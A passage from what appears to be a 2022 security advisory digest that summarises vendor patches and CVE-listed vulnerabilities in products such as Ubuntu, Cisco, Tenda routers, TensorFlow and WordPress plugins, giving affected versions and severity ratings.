CVE ID: CVE-2022-29264 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address multiple vulnerabilities in Dell Client
Platform BIOS that affect Alienware Area-51 R4 and Alienware Area-51 R5.
BookStack has released a security update to address a Cross-Site Scripting (XSS)
vulnerability in its product. The affected versions are BookStack prior to v22.09.
CVE ID: CVE-2022-40690 (Medium)
A command execution vulnerability has been discovered in the background tasks of XXL-JOB.
The affected version is XXL-JOB 2.2.0.
CVE ID: CVE-2022-40929 (Critical)
A vulnerability has been discovered in Zimbra Collaboration (ZCS) that allows to upload
arbitrary files through amavisd via a cpio loophole, and can lead to incorrect access to any
other user accounts. The affected versions are Zimbra Collaboration (ZCS) 8.8.15 and 9.0.
CVE ID: CVE-2022-41352 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in Labstack Echo via
the Static Handler component. The affected version is Labstack Echo v4.8.0.
CVE ID: CVE-2022-40083 (Critical)
GitLab has released updated versions 15.4.1, 15.3.4, and 15.2.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
Cisco has released security updates to resolve privilege escalation, and authentication
bypass vulnerabilities in Cisco SD-WAN, and Cisco Duo for macOS, respectively. An attacker
can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-20662 (Medium), CVE-2022-20775 (High), CVE-2022-20818
(High)
Multiple vulnerabilities such as denial of service, client-side script injection, and
information disclosure have been discovered in several Mitsubishi Electric products. The
mitigations are available.
CVE ID: CVE-2022-29859 (Low), CVE-2022-33322 (Medium), CVE-2022-33321
(Medium)
Drupal has released security update to resolve a vulnerability in Twig, a third-party
libraries used by Drupal that can allows to write Twig code, including potential
unauthorized read access to private files and the contents of other files on the server, or
database credentials.
CVE ID: CVE-2022-39261 (Critical)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.3.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-39249 (High), CVE-2022-39250 (High), CVE-2022-39251 (High),
CVE-2022-39236 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-32886, CVE-2022-37797, CVE-2022-41556, CVE-2022-29599
Local file inclusion vulnerability has been discovered in EyesOfNetwork (EON). The affected
versions are EyesOfNetwork through 5.3.11.
CVE ID: CVE-2022-41571 (Critical)
A SQL injection vulnerability has been discovered in SEyesOfNetwork (EON). The affected
versions are EyesOfNetwork through 5.3.11.
CVE ID: CVE-2022-41570 (Critical)
A SQL injection vulnerability has been discovered in Exam Reviewer Management System. The
affected version is Exam Reviewer Management System 1.0.
CVE ID: CVE-2022-40877 (Critical)
An unauthenticated blind SQL Injection vulnerability has been discovered in Sourcecodester
Online Market Place Site. The affected version is Sourcecodester Online Market Place Site
v1.0.
CVE ID: CVE-2022-30004 (Critical)
Google has released Chrome 109.0.5412.2 (Platform version: 15236.2.0) and LTS channel
102.0.5005.185 (Platform Version: 14695.148.0) for most ChromeOS devices to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-3450 (High), CVE-2022-3449 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20696 (High), CVE-2022-20728 (Medium), CVE-2021-27853 (Medium),
CVE-2021-27854 (Medium), CVE-2021-27861 (Medium), CVE-2021-27862 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a heap-based buffer overflow vulnerability
in the gdal package, which can result in Denial of Service (DoS) or potentially the
execution of arbitrary code, if a specially crafted file is processed with the PCIDSK
driver.
CVE ID: CVE-2021-45943 (Medium)
A SQL injection vulnerability has been discovered in Wedding Planner via the id parameter at
/package_detail.php. The affected version is Wedding Planner v1.0.
CVE ID: CVE-2022-40485 (Critical)
An arbitrary code execution vulnerability has been discovered in joblib package. The
affected versions are joblib from 0 and before 1.2.0.
CVE ID: CVE-2022-21797 (Critical)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Pulse Secure has released security updates to resolve client side desync attacks between the
client machine and VPN server. The affected versions are VPN server prior to 9.1R15.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A SQL injection vulnerability has been discovered in Online Banking System via the cust_id
parameter at /net-banking/edit_customer_action.php. The affected version is Online Banking
System v1.0.
CVE ID: CVE-2022-40122 (Critical)
It has been discovered that Scala has a Java deserialization chain in its JAR file that can
be exploited to erase the contents of arbitrary files, make network connections, or possibly
run arbitrary code via a gadget chain. The affected versions are Scala 2.13.x before 2.13.9.
CVE ID: CVE-2022-36944 (Critical)
A vulnerability has been discovered in Tacitine Firewall due to improper control of code
generation in the Tacitine Firewall web-based management interface. Successful
exploitation by sending a specially crafted http request can allow to execute arbitrary
commands on the targeted device. The affected versions are Tacitine Firewall all versions of
EN6200-PRIME QUAD-35 and EN6200-PRIME QUAD-100 between 19.1.1 to 22.20.1 (inclusive).
CVE ID: CVE-2022-40628 (Critical)
A heap-based buffer overflow vulnerability has been discovered in Rockwell Automation
ThinManager ThinServer, which can expose the server to arbitrary Remote Code Execution
(RCE). The affected versions are Rockwell Automation ThinManager ThinServer versions 11.0.0
- 13.0.0.
CVE ID: CVE-2022-38742 (Critical)
A stack overflow vulnerability has been discovered in Grandstream GSD3710. The affected
version is Grandstream GSD3710 1.0.11.13.
CVE ID: CVE-2022-2070 (Critical)
A stack overflow vulnerability has been discovered in Grandstream GSD3710. The affected
version is Grandstream GSD3710 1.0.11.13.
CVE ID: CVE-2022-2025 (Critical)
A broken access control vulnerability has been discovered in ZTE ZXvSTB product. Due to
improper permission control, attackers can use this vulnerability to delete the default
application type, which affects normal use of the system.
CVE ID: CVE-2022-23144 (Critical)
It has been discovered that Apache Pinot, Pinot query endpoint and realtime ingestion layer
have a vulnerability in unprotected environments due to groovy function support. The
affected versions are Apache Pinot 0.10.0 or below.
CVE ID: CVE-2022-26112 (Critical)
An integer overflow vulnerability has been discovered in Redis. The affected versions are
Redis 7.0.0 & above and prior to 7.0.5.
CVE ID: CVE-2022-35951 (Critical)
Carlo Gavazzi Controls SpA has released security updates to address multiple vulnerabilities
in UWP 3.0 family of Monitoring Gateways and Controllers, and CPY Car Park Server in their
set-up software, runtime firmware, and embedded Web interface. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22522 (Critical), CVE-2022-22524 (Critical), CVE-2022-22526
(Critical), CVE-2022-28811 (Critical), CVE-2022-28812 (Critical), CVE-2022-28814 (Critical),
CVE-2022-28816 (High), CVE-2022-22523 (High), CVE-2022-28813 (High), CVE-2022-22525 (High),
CVE-2022-28815 (Medium)
Sophos has released security updates to address a code injection vulnerability that allows
Remote Code Execution (RCE) in the User Portal and Webadmin of Sophos Firewall. The affected
versions are Sophos Firewall v19.0 MR1 (19.0.1) and below.
CVE ID: CVE-2022-3236 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple Remote Code Execution (RCE) vulnerabilities have been discovered in WhatsApp. The
affected versions are WhatsApp for Android prior to v2.22.16.12, Business for Android prior
to v2.22.16.12, iOS prior to v2.22.16.12, Business for iOS prior to v2.22.16.12, Android
prior to v2.22.16.2, and WhatsApp for iOS v2.22.15.9.
CVE ID: CVE-2022-36934, CVE-2022-27492
Ubuntu has released security updates to address several vulnerabilities in Linux kernel for
Google Container Engine (GKE). An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2021-33655, CVE-2022-2318, CVE-2022-36946, CVE-2022-26365,
CVE-2022-34495, CVE-2022-33744, CVE-2022-33742, CVE-2022-34494, CVE-2022-33741,
CVE-2022-33743, CVE-2022-33740
Debian has released a security update to address multiple vulnerabilities in Mozilla Firefox
Extended Support Releases (ESR) web browser, which can result in the execution of arbitrary
code, CSP bypass or session fixation.
CVE ID: CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40958 (Medium),
CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40962 (High)
A stack overflow vulnerability has been discovered in Tenda AC15 via the function
fromAddressNat. The affected version is Tenda AC15 V15.03.05.19.
CVE ID: CVE-2022-40851 (Critical)
A stack overflow vulnerability has been discovered in Tenda AC15 and AC18 routers. The
affected version is Tenda AC15 and AC18 routers V15.03.05.19.
CVE ID: CVE-2022-40869 (Critical)
A heap overflow vulnerability has been discovered in Tenda AC15 and AC18 routers. The
affected version is Tenda AC15 and AC18 routers V15.03.05.19.
CVE ID: CVE-2022-40865 (Critical)
A buffer overflow vulnerability has been discovered in Netgear Nighthawk AC1900 Smart WiFi
Dual Band Gigabit Router via the wl binary in firmware. The affected version is Netgear
Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router R7000-V1.0.11.134_10.2.119.
CVE ID: CVE-2022-37235 (Critical)
A buffer overflow vulnerability via uhttpd has been discovered in Netgear N300 wireless
router. The affected version is Netgear N300 wireless router wnr2000v4-V1.0.0.70.
CVE ID: CVE-2022-37232 (Critical)
A stack overflow vulnerability has been discovered in Netgear N300 wireless router via
strcpy in uhttpd. The affected version is Netgear N300 wireless router wnr2000v4-V1.0.0.70.
CVE ID: CVE-2022-31937 (Critical)
A buffer overflow vulnerability has been discovered in 10-Strike Network Inventory Explorer
via the Add Computers function. The affected version is 10-Strike Network Inventory Explorer
v9.3.
CVE ID: CVE-2022-38573 (Critical)
An OS command injection vulnerability has been discovered in NOKIA 1350 OMS. The affected
version is NOKIA 1350 OMS R14.2.
CVE ID: CVE-2022-39815 (Critical)
A client authentication bypass vulnerability has been discovered in Erlang/OTP in certain
client-certification situations for SSL, TLS, and DTLS. The affected versions are Erlang/OTP
before 23.3.4.15, 24.x before 24.3.4.2, and 25.x before 25.0.2.
CVE ID: CVE-2022-37026 (Critical)
COVESA has released a security update to address multiple vulnerabilities in the COVESA DLT
daemon. The affected versions are COVESA DLT daemon 2.18.8 and below.
CVE ID: CVE-2022-39836, CVE-2022-39837
Multiple memory corruption vulnerabilities have been discovered in uClibC and uClibc-ng
libraries that can affect any Unix-based devices that use this library. The affected
versions are uClibC 0.9.33.2 and uClibC-ng 1.0.40.
CVE ID: CVE-2022-29503, CVE-2022-29504
An improper access control vulnerability has been discovered in Measuresoft's Equipment-
ScadaPro Server that can allow a local user with limited privileges to modify the service
binary path and start malicious commands with system privileges. The affected version is
ScadaPro Server 6.7.
CVE ID: CVE-2022-3263 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to resolve Denial of Service (DoS), and privilege
escalation vulnerabilities in Cisco NX-OS Software Border Gateway Protocol, and Cisco Secure
Web Appliance respectively.
CVE ID: CVE-2022-20871 (High), CVE-2018-0295 (High)
Google has released Beta channel 106.0.5249.49 (Platform version: 15054.62.0/15054.63.0) for
most ChromeOS devices, Dev channel 107.0.5304.10 for Windows, Mac and Linux, and Chrome Dev
107 (107.0.5304.8) for Android.
Foxit has released an updated Foxit PDF Editor for Mac 11.1.3, to resolve multiple
vulnerabilities in Foxit PDF Editor for Mac 11.1.2.0420 and earlier for macOS.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A weak password vulnerability has been discovered in a GitHub repository. The affected
versions are GitHub repository ikus060/minarca prior to 4.2.2.
CVE ID: CVE-2022-3268 (Critical)
A SQL injection vulnerability has been discovered in SourceCodester Simple Task Managing
System via the bookId parameter at changeStatus.php. The affected version is SourceCodester
Simple Task Managing System v1.0.
CVE ID: CVE-2022-40030 (Critical)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in a web server
component of TIBCO Software Inc's TIBCO EBX Add-ons. The affected versions are TIBCO EBX
Add-ons 5.4.1 and below.
CVE ID: CVE-2022-30578 (Critical)
A stored Cross Site Scripting (XSS) vulnerability has been discovered in web server
component TIBCO Software Inc's TIBCO EBX. The affected versions are TIBCO EBX 6.0.0 through
6.0.8.
CVE ID: CVE-2022-30577 (Critical)
It has been discovered that Jenkins RQM Plugin is vulnerable to XML External Entity (XXE)
attacks. The affected versions are Jenkins RQM Plugin 2.8 and earlier.
CVE ID: CVE-2022-41241 (Critical)
It has been discovered that Jenkins DotCi Plugin is vulnerable to XML External Entity (XXE)
attacks. The affected versions are Jenkins DotCi Plugin 2.40.00 and earlier.
CVE ID: CVE-2022-41238 (Critical)
It has been discovered that Jenkins Compuware Common Configuration Plugin is vulnerable to
XML External Entity (XXE) attacks. The affected versions are Jenkins Compuware Common
Configuration Plugin 1.0.14 and earlier.
CVE ID: CVE-2022-41226 (Critical)
A SQL injection vulnerability has been discovered in SmartVista SVFE2. The affected version
is SmartVista SVFE2 v2.2.22.
CVE ID: CVE-2022-38619 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability in Z-BlogPHP that allows to make
arbitrary requests via injection of arbitrary URLs into the source parameter. The affected
versions are Z-BlogPHP 1.7.2 and earlier.
CVE ID: CVE-2022-40357 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Valine that allows to
execute arbitrary code via a crafted POST request. The affected version is Valine v1.4.18.
CVE ID: CVE-2022-38545 (Critical)
An authentication bypass vulnerability has been discovered in Linux-PAM package for openSUSE
Tumbleweed. The affected versions are Linux-PAM packages before 1.5.2-6.1.
CVE ID: CVE-2022-28321 (Critical)
Debian has released security updates to address multiple vulnerabilities in BIND9, and
Expat.
CVE ID: CVE-2022-2795 (Medium), CVE-2022-3080 (High), CVE-2022-38177 (High),
CVE-2022-38178 (High), CVE-2022-40674 (Critical)
ISC has released security updates to address vulnerabilities affecting multiple versions of
the ISC’s Berkeley Internet Name Domain (BIND) 9. A remote attacker can exploit these
vulnerabilities to take control of an affected system.
HP has released security updates to resolve buffer overflow, and Remote Code Execution (RCE)
vulnerabilities in HP Print products.
CVE ID: CVE-2022-28721 (Critical), CVE-2022-28722 (High)
WordPress has released a security update to address a Cross-Site Request Forgery (CSRF)
vulnerability in the demon image annotation plugin for WordPress. The affected versions are
demon image annotation versions up to, and including 4.7.
CVE ID: CVE-2022-2864 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
SUSE has released security updates to resolve multiple vulnerabilities in
skelcd-control-suse-manager-proxy, and skelcd-control-suse-manager-server. The affected
products are SUSE Manager Proxy 4.3, SUSE Manager Retail Branch Server 4.3, and SUSE Manager
Server 4.3.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Debian has released a security update to address a command execution vulnerability while
processing untrusted files in wordexp() function of tinygltf package.
CVE ID: CVE-2022-3008 (High)
A heap-use-after-free vulnerability has been discovered in SWFTools commit 772e55a via the
function grow_unicode at /lib/ttf.c.
CVE ID: CVE-2022-40009 (Critical)
A heap-buffer overflow vulnerability has been discovered in SWFTools commit 772e55a via the
function readU8 at /lib/ttf.c.
CVE ID: CVE-2022-40008 (Critical)
A file upload vulnerability has been discovered in the storage feature of pagekit, that can
allow to upload malicious files. The affected version is pagekit 1.0.18.
CVE ID: CVE-2022-38916 (Critical)
Kayrasoft has released a security update to address SQL injection vulnerability in its
products. The affected versions are Kayrasoft products before version 2.
CVE ID: CVE-2022-2177 (Critical)
It has been discovered that an exposed external port for the telnet service can cause a
vulnerability in NIS-HAP11AC which can allow source code hijacking, remote control of the
device.
CVE ID: CVE-2022-23768 (Critical)
Trend Micro has released a security update to address an unauthenticated file deletion
vulnerability in Trend Micro Mobile Security, which can allow access to the Management
Server to delete files. The affected version is Trend Micro Mobile Security for Enterprise
9.8 SP5.
CVE ID: CVE-2022-40980 (Critical)
A vulnerability has been discovered in Trend Micro Apex One and Trend Micro Apex One as a
Service that allow to bypass the product’s login authentication by falsifying request
parameters on affected installations.
CVE ID: CVE-2022-40144 (Critical)
It has been discovered that due to a reliance on client-side authentication, the WiFi Mouse
(Mouse Server) from Necta LLC's authentication mechanism is trivially bypassed, which can
result in Remote Code Execution (RCE).
CVE ID: CVE-2022-3218 (Critical)
It has been discovered that the d8s-ip-addresses for python include a potential
code-execution backdoor inserted by a third party. The affected version is 0.1.0.
CVE ID: CVE-2022-40810 (Critical)
A SQL injection vulnerability has been discovered in Zephyr Project Manager WordPress
plugin. The affected versions are Zephyr Project Manager WordPress plugin before 3.2.5.
CVE ID: CVE-2022-2840 (Critical)
A SQL injection vulnerability has been discovered in Ketchup Restaurant Reservations
WordPress plugin. The affected versions are Ketchup Restaurant Reservations WordPress plugin
through 1.0.0.
CVE ID: CVE-2022-2754 (Critical)
A SQL injection vulnerability has been discovered in Zoho ManageEngine Password Manager Pro,
PAM360, and Access Manager Plus. The affected versions are Password Manager Pro through
12120 before 12121, PAM360 through 5550 before 5600, and Access Manager Plus through 4304
before 4305.
CVE ID: CVE-2022-40300 (Critical)
Microsoft has released a security update to address a spoofing vulnerability in Microsoft
Endpoint Configuration Manager. The affected versions are Microsoft Endpoint Configuration
Manager versions 2103 – 2207.
CVE ID: CVE-2022-37972 (High)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.3. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40958 (Medium),
CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40962 (High), CVE-2022-3155
(Low)
A protection mechanism failure vulnerability has been discovered in Medtronic's
Equipment- MiniMed 600 Series Insulin Pumps, Guardian Link 3 Transmitter, Guardian 2 Link
Transmitter, Carelink USB, Contour Next Link 2.4. Successful exploitation of this
vulnerability can impact delivery of insulin.
CVE ID: CVE-2022-32537 (Medium)
Host Engineering has released a security update to address a stack-based buffer overflow
vulnerability in its equipment- H0-ECOM100 Communications Module, which can crash the device
being accessed and lead to a Denial-of-Service (DoS) condition.
CVE ID: CVE-2022-3228 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.3, and Firefox 105. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-40959 (High), CVE-2022-40960 (High), CVE-2022-40958 (Medium),
CVE-2022-40956 (Low), CVE-2022-40957 (Low), CVE-2022-40962 (High), CVE-2022-40961
(Medium)
Dell has released a security update to address multiple vulnerabilities in third-part
components that affects Dell NetWorker vProxy. The affected versions are Dell NetWorker
vProxy 4.3.0-31 and earlier.
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
It has been discovered that Festo control block CPX-CEC-C1 and CPX-CMXX allow
unauthenticated, remote access to critical webpage functions which can cause a Denial of
Service (DoS). The affected versions are Control block CPX-CEC-C1 2.0.12 and below, and
Control block CPX-CMXX 1.2.34 rev.404 and below.
CVE ID: CVE ID: CVE-2022-3079
TensorFlow has released security update to address a vulnerability that either write content
at the wrong index or trigger a crash. The affected versions are TensorFlow 2.9.1,
TensorFlow 2.8.1, and TensorFlow 2.7.2.
CVE ID: CVE-2022-35939 (Critical)
TensorFlow has released security update to address a vulnerability that leads to an
out-of-bounds memory read or a crash. The affected versions are TensorFlow 2.9.1, TensorFlow
2.8.1, and TensorFlow 2.7.2.
CVE ID: CVE-2022-35938 (Critical)
TensorFlow has released security update to address a vulnerability that leads to an
out-of-bounds memory read. The affected versions are TensorFlow 2.9.1, TensorFlow 2.8.1, and
TensorFlow 2.7.2.
CVE ID: CVE-2022-35937 (Critical)
A vulnerability has been discovered in iAware module while managing malicious apps.
Successful exploitation of this vulnerability can cause malicious apps to automatically
start upon system startup.
CVE ID: CVE-2022-39000 (Critical)
An improper update of reference count vulnerability has been discovered in AOD module.
Successful exploitation of this vulnerability can affect data integrity, confidentiality,
and availability.
CVE ID: CVE-2022-38999 (Critical)
Remote Code Execution vulnerability has been discovered in Tenhot router. The affected
version is Tenhot TWS-100 V4.0-201809201424.
CVE ID: CVE-2022-37861 (Critical)
A vulnerability has been discovered in Airties Smart Wi-Fi that allows attackers to change
the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure
Direct Object Reference. The affected versions are Airties Smart Wi-Fi before 2020-08-04.
CVE ID: CVE-2022-38789 (Critical)
Authentication Bypass vulnerability by Primary Weakness has been discovered in GitHub
repository. The affected versions are GitHub repository bookwyrm-social/bookwyrm prior to
0.4.5.
CVE ID: CVE-2022-2651 (Critical)
Dataprobe has released security update to address multiple vulnerabilities in its equipment-
iBoot-PDU FW. Successful exploitation of these vulnerabilities can lead to unauthenticated
remote code execution on the Dataprobe iBoot-PDU device.
CVE ID: CVE-2022-3183 (Critical), CVE-2022-3184 (Critical), CVE-2022-3185 (Medium),
CVE-2022-3186 (High), CVE-2022-3187 (Medium), CVE-2022-3188 (Medium), CVE-2022-3189
(Medium)
MiCODUS has released security update to address multiple vulnerabilities in its equipment-
MV720 GPS tracker. Successful exploitation of these vulnerabilities can allow an attacker
control over any MV720 GPS tracker, granting access to location, routes, fuel cutoff
commands, and the disarming of various features (e.g., alarms).
CVE ID: CVE-2022-2107 (Critical), CVE-2022-2141 (Critical), CVE-2022-2199 (High),
CVE-2022-34150 (High), CVE-2022-33944 (Medium)
OWASP ModSecurity Core Rule Set (CRS) has released security updates to address multiple
vulnerabilities in CRS. The affected versions are legacy CRS versions 3.0.x, 3.1.x, 3.2.1
and 3.3.2.
CVE ID: CVE-2022-39955 (Critical), CVE-2022-39956 (Critical), CVE-2022-39957 (High),
CVE-2022-39958 (High)
Delta Electronics has released a security update to address a use of hard-coded credentials
vulnerability in its equipment- DIAEnergie that can lead to Remote Code Execution (RCE). The
affected products are DIAEnergie version 1.8.0 and prior.
CVE ID: CVE-2022-3214 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.13.1. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-3033 (High), CVE-2022-3032 (Medium), CVE-2022-3034
(Medium)
Moodle has released security updates to address multiple vulnerabilities in several
products.
CVE ID: CVE-2022-40316, CVE-2022-40315, CVE-2022-40314, CVE-2022-40313
Spring has released security updates to address a vulnerability in Spring Data REST. The
affected products are Spring Data REST 3.6.0 to 3.6.6, 3.7.0 to 3.7.2 and older, unsupported
versions.
CVE ID: CVE-2022-31679 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A SQL injection vulnerability have been discovered in the Northstar Club Management
application. The affected version is Northstar Club Management version 6.3.
CVE ID: CVE-2022-26959 (Critical)
A buffer overflow vulnerability has been discovered in Tenda WiFi Routers. The affected
versions are Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router
V15.03.05.19_multi.
CVE ID: CVE-2022-38326 (Critical)
A buffer overflow vulnerability has been discovered in Tenda WiFi Routers. The affected
versions are Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router
V15.03.05.19_multi.
CVE ID: CVE-2022-38325 (Critical)
An out-of-bounds read vulnerability has been discovered in the DNS proxy of Connman. The
affected versions are Connman through 1.40.
CVE ID: CVE-2022-23097 (Critical)
An out-of-bounds read vulnerability has been discovered in the DNS proxy of Connman through
1.40. The affected versions are Connman through 1.40.
CVE ID: CVE-2022-23096 (Critical)
A SQL injection vulnerability has been discovered in Gestionnaire Libre de Parc Informatique
(GLPI). The updates are available.
CVE ID: CVE-2022-35947 (Critical)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A command injection vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38828 (Critical)
Buffer Overflow vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38827 (Critical)
An arbitrary command execution vulnerability has been discovered in TOTOLINK. The affected
version is TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38826 (Critical)
Hard coded password vulnerability has been discovered in TOTOLINK. The affected version is
TOTOLINK T6 V4.1.5cu.709_B20210518.
CVE ID: CVE-2022-38823 (Critical)
A vulnerability has been discovered in the component post_applogin.php of Super Flexible
Software for Syncovery. The affected versions are Syncovery 9 for Linux v9.47x and below.
CVE ID: CVE-2022-36536 (Critical)
A command injection vulnerability has been discovered in TOTOLink. The affected version is
TOTOLink A700RU V7.4cu.2313_B20191024. This vulnerability allows attackers to execute
arbitrary commands via a crafted payload.
CVE ID: CVE-2022-38308 (Critical)
Remote Code Execution vulnerability via the ping host feature has been discovered in SmartRG
routers. The affected versions are SmartRG SR506n 2.5.15 and SR510n 2.6.13.
CVE ID: CVE-2022-37661 (Critical)
It has been discovered that the mobile application in Transtek Mojodat FAM (Fixed Asset
Management) allows remote attackers to bypass authorization. The affected version is
Transtek Mojodat FAM 2.4.6.
CVE ID: CVE-2022-38768 (Critical)
Dell has released a security update to address a vulnerability in Advanced Message Queuing
Protocol (AMQP), a third-party component, that affects Dell NetWorker.
CVE ID: CVE-2018-11050 (High)
ASUS has released security updates to address multiple vulnerabilities in ASUS personal
computers, including desktops, laptops and All-in-One PCs.
CVE ID: CVE-2022-36438, CVE-2022-36439
Improper Access Control vulnerability has been discovered in Siemens Mobility's Equipment-
CoreShield One-Way Gateway (OWG) Software. Successful exploitation of this vulnerability can
allow an attacker to leverage the default installation for Windows versions of the
CoreShield (OWG) software, which sets insecure file permissions that can result in local
escalation of privileges to local administrator. The mitigations are available.
CVE ID: CVE-2022-38466 (High)
CISA and the National Security Agency (NSA) have published Open Radio Access Network
Security Considerations. This product assesse the benefits and security considerations
associated with implementing an Open Radio Access Network (Open RAN) architecture.
WordPress has released security update to address a Directory Traversal vulnerability in
SearchWP Live Ajax Search plugin for WordPress. The affected versions are SearchWP Live Ajax
Search versions up to, and including 1.6.2.
CVE ID: CVE-2022-3227 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Google has released Chrome Beta 106 (106.0.5249.41) for iOS, Stable channel 105.0.5195.134
(Platform version: 14989.107.0) for most ChromeOS devices, Dev Channel 107.0.5300.0 for
Windows, Mac and Linux, Chrome 105 (105.0.5195.136) for Android, and Chrome Dev 107
(107.0.5299.0) for Android.
Debian has released a security update to address multiple vulnerabilities in Chromium, which
can result in the execution of arbitrary code, denial of service or information disclosure.
CVE ID: CVE-2022-3195 (High), CVE-2022-3196 (High), CVE-2022-3197 (High),
CVE-2022-3198 (High), CVE-2022-3199 (High), CVE-2022-3200 (High), CVE-2022-3201
(High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
An use-after-free vulnerability has been discovered in the doContent function of
libexpat. The affected versions are libexpat before 2.4.9.
CVE ID: CVE-2022-40674 (Critical)
A SQL Injection vulnerability has been discovered in Loan Management System, which allows
unauthorized users to login as Administrator after injecting username form. The affected
version is Loan Management System 1.0.
CVE ID: CVE-2022-37138 (Critical)
A SQL Injection vulnerability has been discovered in Hospital Information System that allows
for authentication bypass. The affected version is Hospital Information System 1.0.
CVE ID: CVE-2022-36669 (Critical)
An authentication bypass vulnerability has been discovered in OSU Open Source Lab
VNCAuthProxy. The affected versions are OSU Open Source Lab VNCAuthProxy through 1.1.1.
CVE ID: CVE-2022-36436 (Critical)
A Server-Side Request Forgery (SSRF) vulnerability has been discovered in GitHub repository.
The affected versions are GitHub repository prior to 8.1.0.
CVE ID: CVE-2022-2900 (Critical)
A SQL injection vulnerability has been discovered in Hospital Management System via the
Username and Password parameters on the Login page. The affected version is Hospital
Management System v1.0.
CVE ID: CVE-2022-38637 (Critical)
An authentication bypass vulnerability has been discovered in UCMS, which is exploited via
cookie poisoning. The affected version is UCMS v1.6.0.
CVE ID: CVE-2022-38297 (Critical)
An arbitrary file upload vulnerability via the File Manager has been discovered in Cuppa
CMS. The affected version is Cuppa CMS v1.0.
CVE ID: CVE-2022-38296 (Critical)
A pre-authentication command injection vulnerability has been discovered in the web
configuration interface of the TP-Link M7350 V3 with firmware version 190531.
CVE ID: CVE-2022-37860 (Critical)
A Server-Side Request Forgeries (SSRF) vulnerability has been discovered in SLiMS Senayan
Library Management System. The affected version is SLiMS Senayan Library Management System
v9.4.2.
CVE ID: CVE-2022-38292 (Critical)
An improper restriction of XML External Entity Reference (XXE) vulnerability has been
discovered in the Policy Engine of Forcepoint Data Loss Prevention (DLP). The affected
products are Forcepoint Data Loss Prevention (DLP) versions prior to 8.8.2, Forcepoint One
